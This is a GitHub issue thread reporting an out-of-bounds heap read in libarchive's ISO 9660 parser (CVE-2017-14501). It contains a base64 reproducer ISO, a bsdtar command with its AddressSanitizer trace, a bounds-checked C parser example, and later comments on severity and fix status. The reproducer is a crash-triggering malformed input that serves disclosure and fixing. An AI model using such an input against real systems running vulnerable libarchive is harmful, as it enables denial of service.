
out-of-bounds read in archive_read_format_iso9660_read_header() #949

Closed
carnil opened this issue Sep 16, 2017 · 5 comments · Fixed by #1042

Comments

@carnil

carnil commented Sep 16, 2017

Hi

The following was reported downstream in Debian in https://bugs.debian.org/875966

The reproducer (compressed with gzip), base64 of oob.iso.gz, is:

H4sIAAAAAAACA+3WsQmAQAwF0NwqTvCtHED3X0mbaxQEwUa897o0v0lCkgAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAbd2SudXbnOqWS33nSeZ0Stcr/rBwBnlwBV+x9/sPAIzDOw4AAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAADJAVTyAwTg/wAA

Tested against 5562545:

```
ASAN_OPTIONS="detect_leaks=0" ./bsdtar -xOf ~/oob.iso
=================================================================
==13912==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x631000024800 at pc 0x5644c43511e9 bp 0x7ffc1fbd20d0 sp 0x7ffc1fbd20c8
READ of size 1 at 0x631000024800 thread T0
    #0 0x5644c43511e8 in parse_file_info libarchive/archive_read_support_format_iso9660.c:1767
    #1 0x5644c434c76f in choose_volume libarchive/archive_read_support_format_iso9660.c:1115
    #2 0x5644c434cdeb in archive_read_format_iso9660_read_header libarchive/archive_read_support_format_iso9660.c:1181
    #3 0x5644c4304d61 in _archive_read_next_header2 libarchive/archive_read.c:648
    #4 0x5644c430502f in _archive_read_next_header libarchive/archive_read.c:686
    #5 0x5644c43c938f in archive_read_next_header libarchive/archive_virtual.c:148
    #6 0x5644c42e0110 in read_archive tar/read.c:260
    #7 0x5644c42df303 in tar_mode_x tar/read.c:112
    #8 0x5644c42dc62d in main tar/bsdtar.c:866
    #9 0x7f31071db2e0 in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x202e0)
    #10 0x5644c42d7f79 in _start (/root/libarchive/bsdtar+0x3ff79)

0x631000024800 is located 0 bytes to the right of 65536-byte region [0x631000014800,0x631000024800)
allocated by thread T0 here:
    #0 0x7f3108af8b70 in malloc (/usr/lib/x86_64-linux-gnu/libasan.so.4+0xd9b70)
    #1 0x5644c431926e in file_open libarchive/archive_read_open_filename.c:358
    #2 0x5644c4303da8 in archive_read_open1 libarchive/archive_read.c:480
    #3 0x5644c43186ba in archive_read_open_filenames libarchive/archive_read_open_filename.c:152
    #4 0x5644c43182ae in archive_read_open_filename libarchive/archive_read_open_filename.c:109
    #5 0x5644c42dfed2 in read_archive tar/read.c:222
    #6 0x5644c42df303 in tar_mode_x tar/read.c:112
    #7 0x5644c42dc62d in main tar/bsdtar.c:866
    #8 0x7f31071db2e0 in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x202e0)

SUMMARY: AddressSanitizer: heap-buffer-overflow libarchive/archive_read_support_format_iso9660.c:1767 in parse_file_info
Shadow bytes around the buggy address:
  0x0c627fffc8b0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
  0x0c627fffc8c0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
  0x0c627fffc8d0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
  0x0c627fffc8e0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
  0x0c627fffc8f0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
=>0x0c627fffc900:[fa]fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
  0x0c627fffc910: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
  0x0c627fffc920: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
  0x0c627fffc930: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
  0x0c627fffc940: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
  0x0c627fffc950: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
Shadow byte legend (one shadow byte represents 8 application bytes):
  Addressable:           00
  Partially addressable: 01 02 03 04 05 06 07 
  Heap left redzone:       fa
  Freed heap region:       fd
  Stack left redzone:      f1
  Stack mid redzone:       f2
  Stack right redzone:     f3
  Stack after return:      f5
  Stack use after scope:   f8
  Global redzone:          f9
  Global init order:       f6
  Poisoned by user:        f7
  Container overflow:      fc
  Array cookie:            ac
  Intra object redzone:    bb
  ASan internal:           fe
  Left alloca redzone:     ca
  Right alloca redzone:    cb
==13912==ABORTING
```
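As an added illustration (this is not libarchive's parse_file_info() and not the fix from #1042), the parser below checks every length of an ISO 9660 directory record against the bytes actually present in the buffer before any field is read, which is the class of check that turns a 1-byte read just past the 65536-byte block buffer, as in the trace above, into a clean parse error. Field offsets follow ECMA-119; the sample record is constructed, not taken from the reproducer.

```c
#include <stddef.h>
#include <stdint.h>

/* Subset of an ISO 9660 directory record (ECMA-119, 9.1). Offsets are
   from the standard; the parser is an added example, not libarchive's. */
typedef struct {
    uint8_t        dr_len;     /* byte 0: length of the whole record     */
    uint32_t       extent_lba; /* bytes 2..5: extent location (LE half)  */
    uint32_t       data_len;   /* bytes 10..13: data length (LE half)    */
    uint8_t        flags;      /* byte 25: file flags                    */
    uint8_t        name_len;   /* byte 32: file identifier length        */
    const uint8_t *name;       /* bytes 33..: identifier, not NUL-ended  */
} iso_dirrec;

#define ISO_DR_FIXED 33 /* bytes that precede the file identifier */

static uint32_t le32(const uint8_t *p) {
    return (uint32_t)p[0] | ((uint32_t)p[1] << 8) |
           ((uint32_t)p[2] << 16) | ((uint32_t)p[3] << 24);
}

/* Parse the record starting at buf[off]. Each length is validated against
   the bytes available before any field is read, so a record that claims
   more bytes than the block buffer holds is rejected instead of being read
   past the end of the heap allocation.
   Returns 0 on success, -1 for a truncated or malformed record. */
int iso_parse_dirrec(const uint8_t *buf, size_t buf_len, size_t off,
                     iso_dirrec *out) {
    if (off >= buf_len) return -1;          /* even the length byte is OOB */
    uint8_t dr_len = buf[off];
    if (dr_len < ISO_DR_FIXED) return -1;   /* cannot hold the fixed fields */
    if (dr_len > buf_len - off) return -1;  /* record extends past buffer   */
    const uint8_t *r = buf + off;
    uint8_t name_len = r[32];
    if ((size_t)ISO_DR_FIXED + name_len > dr_len) return -1; /* name OOB */
    out->dr_len     = dr_len;
    out->extent_lba = le32(r + 2);
    out->data_len   = le32(r + 10);
    out->flags      = r[25];
    out->name_len   = name_len;
    out->name       = r + ISO_DR_FIXED;
    return 0;
}

/* Constructed 34-byte record: directory "A" at LBA 16, 2048 bytes long. */
const uint8_t iso_sample_rec[34] = {
    34, 0, 0x10,0,0,0, 0,0,0,0x10, 0,0x08,0,0, 0,0,0x08,0,
    0,0,0,0,0,0,0, 0x02, 0,0, 1,0,0,1, 1,'A' };
```

Passing a buffer length one byte shorter than the record claims, or an offset at the end of the buffer, returns -1 instead of touching memory past the allocation.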

carnil commented Sep 17, 2017

This issue was assigned CVE-2017-14501.

@VictorRodriguez

Hi, is there any effort to fix this? How critical is this issue for you?


carnil commented Dec 14, 2017 via email


cemeyer commented Aug 2, 2018

Per MITRE,

CVSS v3.0 Severity and Metrics:
Base Score: 6.5 MEDIUM
Vector: AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H (V3 legend)
Impact Score: 3.6
Exploitability Score: 2.8

@RajeshMalla

Can anybody tell me whether this is fixed in 3.3.3-1.el8 libarchive or not?
